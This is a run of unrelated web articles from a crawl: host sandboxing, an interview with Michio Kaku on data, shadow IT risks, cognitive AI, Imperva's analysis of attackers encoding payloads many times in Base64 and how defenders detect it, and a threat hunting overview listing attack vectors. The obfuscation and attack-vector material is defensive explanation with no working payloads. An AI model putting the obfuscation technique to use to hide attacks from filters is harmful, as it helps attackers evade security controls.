cannot let the system do this itself. So, the developer would have to open up the sandbox himself to perform the action and the program running. When this is enabled, then the program would have the access to the system by default and it would include the documents, the networks, access to some peripherals etc. these peripherals can include the cameras, printers, mouse, calendars, etc. there are some benefits too which are related to this sandbox. Like there are some programs which are there for the protection of program from each other. Hence if someone has made some application or the program for the OS, and that program doesn't need some access to the calendar then if it is accessing the calendar, it is something to be worried about since there the threat is being posed here. The problem would be worst if that program contains some bug there and if the proper sandbox isn't there, then there are some possibilities that the access to the all of the programs can be gained by it and hence the calendar would become corrupted one. If there is some event where the program is actually hacked one, and then it is surly a risk that one would be the victim and the all access would be gained by the hacker. Hence for the protection of the user data, his sandbox application would also help ne preventing the application from getting interfered with each other and hence the stability of the applications used by the users would increase dramatically. Hence when one is using the hosts, he doesn't have to get so much worried sunk there are many of the applications and the techniques which can help someone. One should know about all of them. This way, he will be able to protect himself from many of the attacks which can do some serious damages to the applications in the hosts and the compromise of the data can be done. SPECIAL OFFER: GET 10% OFF Pass your Exam with ExamCollection's PREMIUM files! SPECIAL OFFER: GET 10% OFF Use Discount Code: A confirmation link was sent to your e-mail. Please check your mailbox for a message from [email protected] and follow the directions. Download Free Demo of VCE Exam Simulator Experience Avanset VCE Exam Simulator for yourself. Simply submit your e-mail address below to get started with our interactive software demo of your free trial.
<urn:uuid:567361bf-947c-41cf-8929-0b66dfa62f22>
CC-MAIN-2022-40
https://www.examcollection.com/certification-training/security-plus-how-to-establish-host-security.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00269.warc.gz
en
0.977937
2,367
3
3
In the universe of data science and analytics, data has become as ubiquitous as air. It surrounds us and impacts our everyday lives, whether we are conscious of it or not. Recently, we sat down with theoretical physicist Dr. Michio Kaku, one of the most widely recognized figures in science in the world today, to discuss his theories on the future of data science. “We have learned more about the brain in the last fifteen years than in all prior human history, and the mind, once considered out of reach, is finally assuming center stage.” A ponderance akin to the prospective found in modern analytics. —Dr. Michio Kaku What role has data played in your work and how has it evolved over time? Data is the lifeblood of any science. Just rattle off a list of them and you can see why data is so important. For example, in aeronautics, people want to revive the supersonic transport, but we had one in the Concorde, but the Concorde created a Sonic boom. It shattered windows. Nobody wanted the Concorde flying overhead. The Concorde was financially troubled because it could not fly across the United States, for example. As Big Data only gets bigger and the universe of analytics expands to allow anyone to be a data savant, we continue to see people take on professions they otherwise may not have fit into in the past. Data science is inherently complex, but still accessible, understandable, and achievable to those not classically trained. Those who change careers or become "citizen data scientists" often have deep expertise in another field which means they bring the right questions to the table, and data democratization enables them to answer those questions. What advice would you share with those explaining complex concepts in a way that is accessible? Data is going to be the lifeblood and the energy source of modern civilization. And we can’t drown in data. We have to be able to explain it to the public why data is so important and why it's going to fuel the revolutions of the future. We’ll need to explain why data is just like oil was the lifeblood of the previous revolutions. Data will be the lifeblood of the next revolutions coupled with artificial intelligence, big data, analytics, and all the concepts we’ve come to associate with data. We're going to be able to digitize society. Every aspect of society is going to be turned upside down by data. Any industry, any scientific discipline, will be digitized and analyzed by analytics and artificial intelligence. We have to be able to explain this to the average person because they're going to benefit from it. Aha moments are quite thrilling for those who are using analytics to make a real impact. Can you describe your process or some of your techniques for coming to some of your own aha moments? Sometimes we can know too much. You think you know something so well that when something deviates from your common sense, you say, “ah, can't be right. It must be wrong.” And you close yourself off from out-of-the-box ideas, which may have the final solution to the problem. Is there a process you adopt to acknowledge that oddball idea? That’s what separates the great scientist from the grand scientists who are not so great. The great scientist can see patterns that other scientists cannot see. Artificial intelligence tries to use computers to find patterns, but many times humans are better at finding patterns than robots. Robots tend to be very conservative. Humans can make leaps of logic and sometimes that's required to find that aha moment that makes everything work. "Analytics allows us to explore areas that we once thought were out of reach. Look at, for example, my field, physics, the large Hadron Collider generates enormous quantities of data, tremendous quantities of data, every time we smash protons apart. Analytics allows us to analyze this mountain of data. It accesses areas of physics that we thought were out of reach because it was just computationally too difficult." Hear Dr. Kaku on the Alter.Everything podcast. Find out more about Michio Kaku and his contributions within the data science and analytics community. Check out A Brief History on the Evolution of Analytics to learn all about the history of analytics and where it’s going next. Read This Next Top Priorities for Corporate Tax Departments The success of tax departments depends on the establishment of a balance between the demands of technology and employees’ needs rather than the number of technical solutions it has at its disposal. How Leaders Can Adapt Analytics Strategies for 2023 Explore what an analytics strategy is, how you can see ROI from your strategy, and how to develop one. How to Increase ROI Through Data Democratization See 4 things you should do to increase ROI through democratization.
<urn:uuid:7df142f0-0b65-4a38-8827-fcf988a0ff75>
CC-MAIN-2022-40
https://www.alteryx.com/input/blog/ask-a-theoretical-physicist-the-science-of-data
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00269.warc.gz
en
0.946805
1,027
2.796875
3
Using unapproved tools, software, and devices is risky. You never know what vulnerabilities so-called shadow IT may have. The pandemic that began in 2020 put a new spin on the shadow IT problem. The sudden need to handle all processes remotely was a true challenge, since the majority of corporate networks were not configured to be safely accessed by employees from home. Although it may seem that telecommuters got used to the security rules for remote work, there’s a risk they learned how to get around them. Using unauthorized third-party software while accessing corporate networks may pose a danger to an organization’s critical assets. In this article, we define what shadow IT is and why employees use unapproved software. We also specify major cybersecurity risks that can be caused by shadow IT and offer six ways to effectively address them. Shadow IT: definition and types What is shadow IT? Shadow IT refers to any IT system, solution, device, or technology used within an organization without the knowledge and approval of the corporate IT department. Common examples of shadow IT are cloud services, file sharing applications, and messengers that aren’t explicitly allowed according to an organization’s cybersecurity rules and guidelines. The risk of using such software is that it can have cybersecurity flaws and lead to various incidents like sensitive data exposure. Definition of shadow IT by Gartner There can be various sources of shadow IT. The four most common are: - File storage solutions. Employees often need to share files, folders, and screenshots with each other. The danger is that they can choose solutions that don’t secure data well enough, such as Lightshot, whose captured screenshots can be openly accessed. Using personal Dropbox and Google Drive accounts also constitutes insecure data sharing. - Productivity, collaboration, and project management tools. Aiming to better organize teamwork, collaborate with colleagues, and improve productivity, employees often experiment with online services. But using insecure tools like Trello, Asana, and Zoom for sharing work-related information may be a cause of unintentional data leaks. - Messaging apps. People often use messengers for both work-related and non work-related chats. This can be a severe cybersecurity issue if workers share corporate files, data, and credentials within insecure messengers like WhatsApp, Signal, or Telegram. To avoid that, it’s essential to ensure the communication tools your employees use are consistent and secure. - Email services. The majority of employees have at least two email addresses: a personal and a corporate. With an average of 121 sent and received business emails per employee each day, workers can get mixed up between their email accounts and unintentionally expose sensitive data to third parties. To efficiently address the risks of shadow IT, we need to understand why employees turn to unapproved IT solutions in the first place. Let’s explore the most common reasons in the next section. Why do people use shadow IT? In most cases, employees find an organization’s IT solutions inefficient. Instead of sticking to them, workers adopt new technologies that help them do their jobs faster and achieve better results. Another possible reason is that employees simply have their own set of preferred software and services they feel comfortable working with. Let’s explore the most common reasons why people choose unapproved IT solutions over standard software packages: - Employees find approved software and services inefficient - Approved software is complicated and uncomfortable to work with - Allowed solutions are incompatible with employees’ devices - Employees don’t fully understand the security risks posed by shadow IT As you can see, a common problem is that corporate IT infrastructure operates slowly and makes day-to-day work processes inconvenient. Plus, regular users often don’t know which solutions belong to shadow IT and what risks they pose. So instead of turning to the corporate IT department for help and assistance, employees start using unapproved software and services for their day-to-day work. Why do you need to keep an eye on shadow IT? What are the risks of shadow IT? The presence of unknown and unapproved software and devices within organizational networks creates a lot of issues for cybersecurity departments. In April 2021, Insight Global admitted that the personal information of some Pennsylvanians was exposed to third parties. This unintentional data leak was caused by employees who used several Google accounts for sharing information as part of an unauthorized collaboration channel. This data included names of people who may have been exposed to COVID-19, emails addresses, and other information needed for social services. Security gaps caused by shadow IT can also create new opportunities for hackers. Hackers can hijack a vulnerable device that’s connected to a corporate network (this could be someone’s personal laptop or smartphone) and use it to exfiltrate data or launch a DDoS attack. Here are the six most significant risks and challenges posed by shadow IT: Lack of IT control If your IT department doesn’t know about software that exists within the corporate network, they can’t check whether it’s safe to use and ensure that corporate assets are secured. This lack of control over the solutions used within the corporate network can expand attack surfaces. Data loss and data leaks When using shadow IT solutions, some employees may get access to data they aren’t supposed to have access to. Another problem is the risk of losing critical data. There’s a chance that an unapproved application doesn’t ensure data backups and that employees haven’t thought about creating a proper recovery strategy. Thus, if something happens, important data may be lost. Unpatched vulnerabilities and errors Software vendors constantly release new patches to resolve vulnerabilities and fix errors found in their products. Usually, it’s up to a company’s IT team to keep an eye on such updates and apply them in a timely manner. But when it comes to shadow IT, administrators can’t keep all products and devices up to date simply because they’re unaware of their existence. Shadow IT may break compliance with various regulations, standards, and laws, which in turn may lead to fines, lawsuits, and reputational losses. For instance, under the General Data Protection Regulation (GDPR), organizations are obliged to process users’ personal data lawfully, fairly, and transparently. But without knowing all of the software used by their employees, companies can’t ensure that only authorized workers can access sensitive data. Even though boosting efficiency is one of the reasons many people start using shadow IT in the first place, chances are high that the result will be the complete opposite. Every new technology needs to be checked and tested by the IT team before being implemented in the corporate infrastructure. This is necessary to ensure that new software works correctly and that there are no software and hardware conflicts or serious failures. Unapproved software and services often duplicate the functionality of authorized ones, meaning your company spends money inefficiently. Apart from that, shadow IT risks may lead to real incidents, which in turn incur expenses for damage control, fines for non-compliance with cybersecurity requirements, and legal fees. What to do with shadow IT in your organization? The short answer is to improve management of all technology resources. There’s no sense in trying to get rid of shadow IT completely, since workers will always find ways to use solutions they want. Moreover, shadow IT can help your organization improve the efficiency of its business processes. The best tactic for dealing with shadow IT is to: 1. Define major risks posed by shadow IT and address them. We’ll take a closer look at mitigation tactics in the next section. 2. Encourage employees to be transparent about what software they use. First, this will help you detect the use of risky solutions. Second, new tools adopted by your employees may turn out to be more efficient than your standard software. 3. Educate employees on the possible consequences of using untrusted software. Overwhelmed with their routine work, people may forget to mention additional tools they use. But clearly understanding the potential risks and consequences of adopting new solutions will make workers think twice before trying new software without consulting the IT department. 4. Ensure that your IT department considers solutions that are both secure and convenient. There’s a chance your system administrators and IT specialists only pay attention to security details of software, ignoring its convenience for workers. Establish communication between employees and the IT department to make sure they agree on software that meets both security requirements and employees’ expectations. When approaching the shadow IT problem carefully, you can not only detect cybersecurity risks but also test various technologies and choose more efficient tools for your organization. Doing so may help you optimize your expenses and find weak spots in current work processes. Now, let’s explore in detail how you can address common shadow IT risks. How to mitigate shadow IT risks In order to get the most benefits out of your employees’ initiatives, you should be able to mitigate risks coming from the use of shadow IT. Here are six efficient strategies for mitigating shadow IT security risks in your organization: 1. Build a flexible corporate policy A well-thought-out corporate policy that addresses your business’s most critical cybersecurity issues is a must. To achieve it, start with establishing comprehensible guidelines around the use of personal devices, third-party applications, and cloud services. For starters, you can divide your software into categories to help employees better understand the risks of using shadow IT and offer them alternatives. Here are examples of categories in which you can place shadow IT resources: - Sanctioned. Tools that are approved by an organization’s IT department and recommended for use within the corporate network - Authorized. Additional software whose use is allowed - Prohibited. Potentially dangerous solutions that may have vulnerabilities or store data insecurely In case employees want to use solutions absent from the lists of sanctioned and authorized software, they should first ask your IT department to check their security. After checking a tool’s security, the IT department will then add it to the sanctioned, authorized, or prohibited category. 2. Educate your employees on shadow IT One of the most effective ways to mitigate shadow IT risks is to educate your employees about the true dangers of using unapproved software. People often don’t fully understand the possible consequences of their actions and don’t realize the risks. By explaining the true reasons behind shadow IT prohibitions, you can significantly lower the number of unsanctioned software installations. Also, it will help you encourage workers to be more transparent about the difficulties they have with approved solutions and the true reasons for secretly deploying alternatives. 3. Give your employees the tools they need Remember why people usually turn to shadow IT in the first place? In most cases, it’s because the standard corporate tools aren’t effective and convenient enough. A good practice is to create a space for open communication between workers and the IT department. When you learn what your employees really need, you can find efficient software and eliminate the risks of employees using unapproved software in secret. In case a solution your employees want to use isn’t secure enough or may lead to non-compliance with requirements, it’s essential to clearly explain potential risks. And if possible, offer alternatives that provide the required data security. 4. Keep an eye on the cloud Not all cloud-based services provide decent data security. Various SaaS products and cloud services like Salesforce and Dropbox hold a special place in shadow IT. According to a 2021 survey, among 86% of respondents, the annual cost of cloud accounts was over $500,000. The risks of data leaks are especially high if your employees choose freemium models and continuously move from one tool to another, leveraging free trials and putting sensitive data at risk. This is why it’s crucial to make sure that cloud-based solutions approved for use within your organization are secure and consistent. 5. Use shadow IT discovery tools Without knowledge, there’s no control. Detecting unapproved applications will help you instantly take necessary actions and minimize possible consequences. To do that, adopt solutions that monitor your corporate networks and detect: - Anomalous network activities - Software downloading and installation - Data and workload migrations - Other indicators of possible shadow IT practices 6. Monitor your networks and employee activity Monitoring what happens within your corporate network is an effective way to gather information about the software, applications, and web resources your employees work with. Based on this knowledge, you can detect who in your company starts using unapproved IT solutions and when. Apart from that, you can apply user activity monitoring to detect and address insider threats. Also, employee monitoring can help you comply with various cybersecurity laws and regulations, since a lot of requirements oblige you to ensure that only authorized users can access sensitive data. Ensure efficient and robust monitoring with Ekran System Ekran System is an insider risk detection platform that provides you with complete information about user activities, whether users are in-house employees, remote workers, or subcontractors. Our solution thoroughly records employees’ activities, capturing a wide range of metadata such as launched applications, keystrokes, and opened websites. When reviewing user session records, you can easily search for parameters and detect the use of prohibited software in only a few clicks. Ekran System can help you: - Monitor software use. See what kind of software your employees use and how. This allows you to not only discover shadow IT sources but also understand how shadow IT originated and why it persists. - Monitor internet use. Receive information about the websites visited by your employees and the time spent on each. In this way, you can discover unauthorised use of cloud services. - Monitor and block USB devices. Detect connected USB devices and block them automatically or manually. This can be useful in stopping shadow IT, particularly if the use of USB devices is prohibited by your company’s security policy. - See firsthand what happens to your sensitive data. With Ekran System, you can see exactly how your sensitive data is accessed and used — and by whom. This can help you detect and target shadow IT applications that directly interact with sensitive data. Then, you can adjust the selection of approved software in order to improve the effectiveness of current processes and mitigate the need for shadow IT. Shadow IT is not only a cybersecurity issue but also can be a symptom of an inefficient IT strategy. By listening to the needs of your employees and providing them with tools that are both effective and secure, you can significantly reduce shadow IT-related risks and increase your employees’ productivity. Still, clearly understanding the possible danger from shadow IT is vital for ensuring proper security of your organization’s critical assets. Once you define shadow IT risks, you can better detect the use of insecure software, establish continuous user activity monitoring, and plan employees’ cybersecurity education. If you’re ready to enhance your cybersecurity strategy with an efficient user monitoring solution, try Ekran System. Request a 30-day trial to see how exactly our solution can meet your needs.
<urn:uuid:a90ed7fb-0c06-46ea-8bfc-be0456a3da08>
CC-MAIN-2022-40
https://www.ekransystem.com/en/blog/shadow-it-risks
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00269.warc.gz
en
0.92404
3,151
2.625
3
since the beginning of computing, AI has always been the end target, and with modern cognitive computing models, we seem to be getting closer and closer to that goal every day. Copyright by autome.me Due to the amalgamation of cognitive science and based on the fundamental principle of simulating the cycle of human thought, cognitive AI applications have far-reaching impacts not only on our private lives but also on industries such as medicine, banking, and more. The benefits of cognitive technology are well and a step further than conventional AI systems. While the basic use case of artificial intelligence is to apply the best algorithm for solving a problem, cognitive computing tries to mimic human intelligence and logical abilities by evaluating a set of variables. The cognitive computing process uses a mixture of artificial intelligence, machine learning, neural networks, sentiment analysis, natural language processing, and contextual awareness to solve everyday problems as human beings do. The ability of computer systems to do that means we are making a thing that will be as intelligent as humans and thus help humans in their daily roles. Let’s see how our world is and will become a better place due to Cognitive AI. Cognitive AI Makes Our Cities Better With the rapid development that we were chasing, most of our cities grew at an exponential rate causing commutation, transportation, water, roads, drainage, and other systems of our cities to run into several issues. To avoid these, we need to manage and track the processes so that hamper the progress of a simple citizen. By making sense of data from traffic cameras, mapping the busiest locations, and rerouting traffic, cognitive technology can help rescue commuters. Cognitive computing could also assist with traffic management by analyzing social and customer behavior. Considering the aging infrastructure of a city, Analytics will help policymakers determine what, when, where, and how to operate or replace such decaying equipment with a smarter city plan, before it affects too many people. Cognitive AI Makes Our Businesses Efficient Cognitive computing can identify emerging trends, spot new business opportunities, and take real-time accountability for important process-centered issues. A cognitive computing system can automate procedures, reduce errors, and adapt according to changing circumstances by analyzing a vast amount of data. While this prepares companies to build an appropriate response to uncontrollable circumstances, it helps create affective business processes at the same time. By introducing robotic process automation (RPA), existing systems can improve customer interactions. Because cognitive computing allows only appropriate, meaningful, and customers will get valuable information, it improves customer experience and thus makes customers happy and much more engaged. […] Read more: autome.me
<urn:uuid:acc26cad-2ba3-46f3-b185-794fd7369c68>
CC-MAIN-2022-40
https://swisscognitive.ch/2021/06/25/3-ways-cognitive-ai-and-computing-are-making-our-lives-better/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00469.warc.gz
en
0.930168
532
3.046875
3
Web application threats come in different shapes and sizes. These threats mostly stem from web application vulnerabilities, published daily by the vendors themselves or by third-party researchers, followed by vigilant attackers exploiting them. To cover their tracks and increase their attack success rate, hackers often obfuscate attacks using different techniques. Obfuscation of web application attacks can be extremely complicated, involving custom-made encoding schemes made by the attacker to suit a specific need. Alternatively, and as described in a recent spam campaign research we conducted, obfuscation of web application attacks can be as simple as importing common encoding schemes and re-encoding the attack payloads multiple times. In this blog post, we’ll dive deep into one of the simplest obfuscation techniques commonly used by web application attackers – Base64 – and uncover some of the traits making it so unique and interesting from the defender perspective. What is Base64? Base64 is an encoding mechanism used to represent and stream binary data over mediums limited to printable characters only. The name Base64 comes from the fact that each output character is represented in 6-bits, hence there are characters that can be represented… lower and upper case letters, numbers and the “+” and “/” signs. Originally, Base64 encoding was used to safely transfer email messages, including binary attachments, over the web. Today, Base64 encoding is widely used to transfer any type of binary data across the web as a means to ensure data integrity at the recipient. In short, Base64 takes three 8–bits ASCII characters as an input, making it 24-bits in total. It then splits these 24 bits into four parts of six bits each and translates each of the six bits into a character using the Base64 encoding table. If there are less than three characters as an input, the encoding pads the Base64 encoding output using the “=” sign. Since Base64 is commonly used to encode and transfer data over the web, security controls often decode the traffic as a preprocessing step just before analyzing it. Unfortunately, this encoding technique is often abused and used to carry obfuscated malicious payloads disguised as legitimate Base64-encoded content. Attacks Encoded in Base64 – The Tells While Base64 encoding is very useful to transfer binary data over the web, there is no practical need to do multiple encoding of the same text. With that in mind, it’s a common practice among attackers to obfuscate their attacks using multiple encodings of the same text—to the extent of encoding an attack a few dozen times to evade detection. Thanks to some interesting characteristics of Base64, however, encoding the attack payload multiple times in Base64 actually makes things worse for the attacker and easier for the defender. 1. Inflated Output Size Every three 8-bits characters encoded in Base64 are transformed into four 6-bits characters, which is why multiple encoding with Base64 increases output. More precisely, the output grows exponentially, multiplying itself by 1.3333 with each encoding (see Figure 1). 2. Fixed Prefix A unique attribute of Base64 encoding is that each piece of text that is encoded several times will eventually have the same prefix. The first letters of the prefix are forever: “Vm0wd”. This same prefix will always appear when doing multiple Base64 encodings, and the size of the prefix will grow as more encodings are done (Figures 2 and 3). For more details on the fixed prefix, why it always appears—no matter the input or rate at which its size increases—see the detailed Technical Appendix. Attacker Lose-Lose Situation Attackers trying to obfuscate their attacks using multiple Base64 encodings face a problem. Either they encode their attack payload a small number of times, making it feasible for the defender to decode and identify. Alternatively, they can encode the input multiple times, generating a very large payload making it unfeasible to decode, but also possessing a stronger, fixed, Base64 prefix fingerprint for the defender to detect. The net net: Multiple Base64 encoding = Longer fixed prefix = Stronger attack detection fingerprint There are three primary strategies to consider for mitigation of attacks encoded in Base64: Attacks encoded multiple times in Base64 may be mitigated by decoding the input several times until the real payload is revealed. This method might seem to work, but it opens a door for another vulnerability – Denial of Service (DoS). Decoding a very long text multiple times may take a lot of time. While attackers need to create the long encoded attack only once, the defender must decode it on every incoming request in order to identify and mitigate the attack in full. Thus, decoding the input several times opens the door for attackers to launch DoS attacks by sending several long encoded texts. Additionally, even if the defender decodes the input many times, say ten, the attacker can just encode the attacks once more and evade detection. So, decoding the input multiple times is neither sufficient nor efficient when the attacks are encoded multiple times. Specifically, in the case of Base64, thanks to the special characteristics of the encoding scheme, there are other ways to mitigate multiple encodings. Suspicious Content Detection As described above, increasing Base64 encoding = longer fixed prefix = stronger attack detection fingerprint. In accordance, defenders can easily detect and mitigate attacks heavily obfuscated by multiple Base64 encoding. A web application firewall (WAF) can offer protection based on this detection. Imperva’s cloud and on-prem WAF customers are protected out of the box from these attacks by utilizing the fixed prefix fingerprint phenomena, and based on the assumption that legitimate users have no practical need to do multiple encoding of the same text. Abnormal Requests Detection As discussed earlier, increased Base64 encoding equates to increased payload output size. Subsequently, defenders can determine the size of a legitimate incoming payload/parameter /header value, and block inflated payloads, exceeding the predefined limits. Imperva’s cloud and on-prem WAF customers are protected out of the box here as well. By integrating both web application profiling that understands incoming traffic to the application over time and identifies abnormalities when they occur, and HTTP hardening policies that enforce illegal protocol behavior like abnormally long requests. Base64 is a popular encoding used to transfer data over the web. It is also often used by attackers to obfuscate their attacks by encoding the same payload several times. Due to some of the characteristics of Base64 encoding, it is possible to detect and mitigate attacks that are obfuscated with several Base64 encodings. To read more about these characteristics see the technical appendix. You can also read more about mitigation techniques using a web application firewall. How Base64 Works The basic idea behind the Base64 encoding technique is to take three characters, each represented in 8-bits, and turn them into four characters, each represented in 6-bits. In more detail… assume we get three characters in ASCII. Each character is mapped to an 8-bit number between 0 and 255 based on the ASCII table (see Figure 4). We take the representation of the three characters in 8-bits and join them together to get 24-bits. Next, we split these 24-bits into four parts with 6-bits in each part, and translate each part using the Base64 table (Figure 5). Each 6-bits have 64 options of characters (hence the name Base64), the characters available are numbers, lowercase and uppercase letters, and the symbols ‘+’ and ‘/’. Overall, Base64 encoding splits the input text into parts of three characters and encodes the three characters as described above. At the end of the process, we might run into a problem where we miss one or two characters to complete the last trio. To solve this, the encoding adds one or two ‘0’ characters at the end to create the last 3-byte group. Then, the Base64 encoding transforms the last characters into ‘=’. That is why sometimes we see Base64-encoded text that ends with one or two ‘=’ characters. Here is an example of how Base64 works on a simple three-character word (Figure 6): The fixed prefix No matter what string is encoded, after encoding to Base64 multiple times, we always end up with the same fixed prefix, which starts with: “Vm0wd”. The reason for this phenomenon is the way the encoding works, and surprisingly, how the letter ‘V’ behaves under the encoding. First, let’s try to encode the letter ‘V’ using base64. In ASCII, the letter ‘V’ is 86, which in 8-bits representation translates to: 01010110. After encoding and ignoring the padding, as we are interested only in the prefix, we take only the first 6 bits of the representation, which means 010101. In base 64, this is 21, which surprisingly is also ‘V’. This means that every time we try to encode anything that starts with the letter ‘V’ we will end up with an encoded string that also starts with ‘V’ (!). This is a never-ending loop. |Letter||ASCII (8 bits)||Base64 (6 bits)| After checking the rest of the characters, ‘V’ is the only one that has this special attribute. So, ‘V’ is the only character that we can put at the beginning of the string we want to encode and end up with the same character at the beginning of the encoded string. The next question is if we encode some random string using Base64, will we always get an encoded string that starts with ‘V’ after a couple of encodings? The answer is yes. Below is a graph showing, bottom up, the Base64 re-encoding outcome for each ASCII-readable character and digit. Each color represents the encoding distance to ‘V’: blue – four encoding iterations; green – three encoding iterations; yellow – two encoding iterations; orange – one encoding iteration. For instance, it takes four encoding iterations to get to ‘V’ from ‘k’ (k->a->Y->W->V) and two iterations from ‘P’ (P->U->V). Overall, the minimal number of iterations getting to ‘V’ is, of course, 0 (‘V’->’V’ J) while the maximum number of iterations is 5 (for instance, starting with the 128 ASCII char ->w->d->Z->W->V ). After the ‘V’ in the prefix is set, more encodings will result in longer fixed prefixes. We tested all the available characters and saw that it takes at most two more encodings to get the next prefix character “m”, and at most two more encodings to get the next character “0”. Before going forward to longer prefixes let’s try to understand why this phenomenon happens. We take the string ‘Vm0’ and encode it using Base64: What happened here is that the first 6-bits of ‘V’ in its 8-bit representation are exactly its 6-bit representation. Now, taking the extra 2-bits from its 8-bits representation and adding the first 4-bits of the representation of ‘m’ in 8-bits gives exactly the 6-bits representation of ‘m’. The same logic goes with the representation of ‘0’. Note that we are left a remaining 6-bits, which is the representation of ‘w’ in 6-bits. Meaning that what makes the ‘Vm0’ prefix special is that its 8-bits representation is similar to its 6-bits representation. Inflation of the prefix It is noteworthy that after encoding the first three letters of the fixed prefix, there is a leftover of 6-bits. These 6-bits will determine the next letter of the prefix. In fact, for every three letters added to the fixed prefix, after encoding there are an extra 6-bits left which will determine an extra character of the prefix. This means that the fixed prefix will inflate in each extra encoding by the number of letters in the prefix, divided by three. For example, if there are nine characters in the fixed prefix, then after another encoding there will be twelve characters in the fixed prefix. Try Imperva for Free Protect your business for 30 days on Imperva.
<urn:uuid:cd35b36f-9184-43ae-826a-ccb6b6efac81>
CC-MAIN-2022-40
https://www.imperva.com/blog/the-catch-22-of-base64-attacker-dilemma-from-a-defender-point-of-view/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.43/warc/CC-MAIN-20220928020513-20220928050513-00469.warc.gz
en
0.91195
2,683
3.015625
3
The “reactive trend” of Cyberthreat monitoring is a very essential issue since it demonstrates that most organizations don’t hunt until the event is identified. They respond simply to intrusion detection systems and event warnings. For instance, it is pointless to simply build a SIEM (Security Information and Event Management) and wait until the alerts arrive at you. Notice that organizations with various environments and security team targets can describe hunting in different ways, for instance hunting for vulnerabilities or attributing threats to offenders. The Cyber Threat Hunting Realistic Model describes threat hunting as an efficient, analyst-led process in which attacking strategies and techniques and procedures can be searched within the area. What Makes Threat Hunting Different? Threat hunting means the identification, researching, and redefining of the concept that hunters find the threat. Threats hunting is an ongoing activity, the protective measure is critical for threat hunting, requires extensive knowledge of threats and experience of the IT system of the company inside and outside. Although threat hunting methods are used by the security team to detect risks, the team is the key part of delivery. CYBER ATTACK ANATOMY Threat players such as cybercrime organizations, national-state hackers, and recruitment hackers have different reasons for targeting an organization: Commercial benefit: Malicious hackers steal information for direct or indirect financial benefit; hackers, for example, steal credit card information to benefit financially from it. To obtain access to personal data and sell it on the dark web, hackers may also compromise a corporate database. Intellectual property theft: hackers steal information about military or industrial secrets, trade secrets and infringements on goods such as aircraft, cars, arms and electronic components, often intended to spy on opponents. Critical infrastructure disruption: Hackers interrupt or compromise networks to cause instability, such as energy power generation, water supply, and transportation systems. Political issue: attackers and “hacktivists” target sites to make a political statement Malicious Insiders: A malicious insider is an employee who exposes private company information and/or exploits company vulnerabilities. Malicious insiders are often unhappy employees. Users with access to sensitive data and networks can inflict extensive damage through privileged misuse and malicious intent. Common Vector of Specific Attack Here are some of the most common ways to deliver a payload and exploit device vulnerabilities for cybercriminals. PHISHING: An email that encourages the recipient to open or click a malicious path to open an infected file. DRIVE-BY-DOWNLOADS: Inadvertently downloaded malware from a compromised website; usually taking advantage of bugs in the operating system or a network. SHADOWING OF DOMAIN: If a hacker possesses credentials from the domain registrar, they can add host records to the DNS records of an entity and then redirect users to these malicious IPs. MALWARE: Malicious code that interferes with services, gathers data, or gains access. In infection and propagation characteristics, different malware strains vary. DENIAL-OF-SERVICE: An effort to make a device or network unavailable; it also uses more computing resources than communication networks can manage or disable. MALVERTISING: Internet advertising owned by cybercriminals. When they click the ad, which can be on any site, including famous sites visited daily, malicious software is downloaded to the user’s systems. Zero-Day Vulnerabilities: This is a vulnerability that nobody is aware of until the breach happens (hence the name zero day, as there is no time elapsed between when the attack happens, and the vulnerability is made public). If a developer has not released a patch for the zero-day vulnerability before a hacker exploits that vulnerability, then the following attack is known as a zero-day attack. Having the red team write POC exploits is a way to mitigate zero-day vulnerabilities. Analyzing Data for Threat Hunting: Data on its own does not equate intelligence, so it would be overkill to simply record all of the logs or events that make noisy on your network. What are the systems, data or intellectual property that will cripple the company if compromised? The following are some of the types of logs that might be appropriate to gather in your scenario: Essential Cyber Threat Hunting Tools Types: Analytics-Driven: Threat hunting tools powered by analytics use behavior analytics and threat hunting for machine learning to produce key metrics and other possibilities. The following are examples of analytics tools: Maltego CE, Cuckoo Sandbox, and Automater. Maltego CE is a method for data-mining. For relation analysis, it makes active relationship and is also used for online investigations. It works by identifying relationships on the internet between portions of data from various sources. You will be notified if these add up to a threat. Cuckoo Sandbox is an open-source malware analysis system which allows any suspicious files to be disposed of while collecting detailed results up-to-the-minute. In order to better understand how to avoid them, Cuckoo Sandbox is able to provide you information and analytics about how malicious files work. Automater focuses on intrusion data. You select a goal and the findings from common sources are checked by Automater. Threat hunting, powered by intelligence, collects all the information and reporting you already have on hand and applies it to threat hunting.Examples of intelligence platforms for cyber threats include: YARA, CrowdFMS, and BotScout. In order to construct definitions based on binary and textual patterns, YARA classifies malware. The details are then used to assess and put a stop to the malware’s identity. CrowdFMS is an automated program that gathers samples from a website that publishes phishing email information and processes them. An alert will be activated if anything crosses through your network that matches a known phishing email. BotScout prevents bots from registering on forums that contribute to spam, server misuse, and contamination of the database. In order to identify the source and to remove bots, IPs are monitored as well as names and email addresses. Driven by Situational Awareness: To analyze an organization or individual’s patterns, risk analyses are used.The AI Engine and YETI are examples of situational awareness-driven tools. The AI Engine is an interactive tool which helps to modernize the intrusion detection system of your network. Without physical interactions, it can learn and network forensics, network selection, and span detection can be achieved. YETI is an instrument that communicates knowledge on threats through organizations. To help keep everyone updated on the latest threat patterns, businesses can share the data they want from trusted partners. Paid tools also exist, including: Sqrrl, Vectra, and InfoCyte, some of the more common paid threat hunting tools. In the “incident scoping” process of the incident response, hunting still plays a significant role, provided that incident intelligence is now leading the hunters on where to locate additional compromised hosts. This process helps to assess the total number of systems affected and to calculate the amount of seriousness of the violation. They are looking for suspicious actions that may suggest the existence of malicious activity. Effective hunters of cyber threats look for signs indicating ongoing attacks in the system. Threat hunters then take the clues and hypothesize how the attack could be carried out by the hacker.
<urn:uuid:852a2d44-9528-47c3-8a5d-0460a6868e32>
CC-MAIN-2022-40
https://gbhackers.com/catch-the-unknown-cyber-attacks-with-threat-hunting/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00469.warc.gz
en
0.915842
1,527
2.90625
3
